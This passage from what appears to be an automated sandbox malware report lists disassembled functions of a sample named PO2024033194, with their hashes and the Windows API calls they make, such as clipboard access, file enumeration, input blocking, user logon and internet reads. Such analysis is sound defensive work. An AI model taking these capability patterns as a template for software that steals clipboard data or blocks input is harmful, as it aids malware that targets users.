                                                                  • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                                  • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                                  Function 0046DC80 Relevance: 6.1, APIs: 4, Instructions: 70clipboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                  • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                  • CloseClipboard.USER32 ref: 0046DD0D
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                  • CloseClipboard.USER32 ref: 0046DD41
                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                  • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                  • CloseClipboard.USER32 ref: 0046DD99
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                  • String ID:
                                                                  • API String ID: 15083398-0
                                                                  • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                  • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                                  • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                                  • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                                  Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID: U$\
                                                                  • API String ID: 4104443479-100911408
                                                                  • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                  • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                                  • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                                  • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                                  Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID:
                                                                  • API String ID: 3541575487-0
                                                                  • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                  • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                  • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                  • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                  Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                  • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                  • String ID:
                                                                  • API String ID: 48322524-0
                                                                  • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                  • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                  • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                  • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                  Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                  • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                  • String ID:
                                                                  • API String ID: 901099227-0
                                                                  • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                  • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                  • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                  • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                  Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: Proc
                                                                  • String ID:
                                                                  • API String ID: 2346855178-0
                                                                  • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                  • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                  • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                  • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                  Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • BlockInput.USER32(00000001), ref: 0045A38B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: BlockInput
                                                                  • String ID:
                                                                  • API String ID: 3456056419-0
                                                                  • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                  • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                  • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                  • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                  Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: LogonUser
                                                                  • String ID:
                                                                  • API String ID: 1244722697-0
                                                                  • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                  • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                  • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                  • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                  Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: NameUser
                                                                  • String ID:
                                                                  • API String ID: 2645101109-0
                                                                  • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                  • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                  • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                  • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                  Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFilterUnhandled
                                                                  • String ID:
                                                                  • API String ID: 3192549508-0
                                                                  • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                  • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                  • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                  • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                  Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: N@
                                                                  • API String ID: 0-1509896676
                                                                  • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                  • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                  • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                  • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                  Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                  • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                  • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                  • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                  Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                  • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                  • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                  • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                  Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                  • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                  • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                  • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                  Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2163089313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2163069837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163136346.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163156328.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163174668.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163192203.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2163234268.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO2024033194.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                  • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                  • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                  • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                  Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteObject.GDI32(?), ref: 0045953B
                                                                  • DeleteObject.GDI32(?), ref: 00459551
                                                                  • DestroyWindow.USER32(?), ref: 00459563
                                                                  • GetDesktopWindow.USER32 ref: 00459581
                                                                  • GetWindowRect.USER32(00000000), ref: 00459588
                                                                  • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                  • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                  • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                  • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                  • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
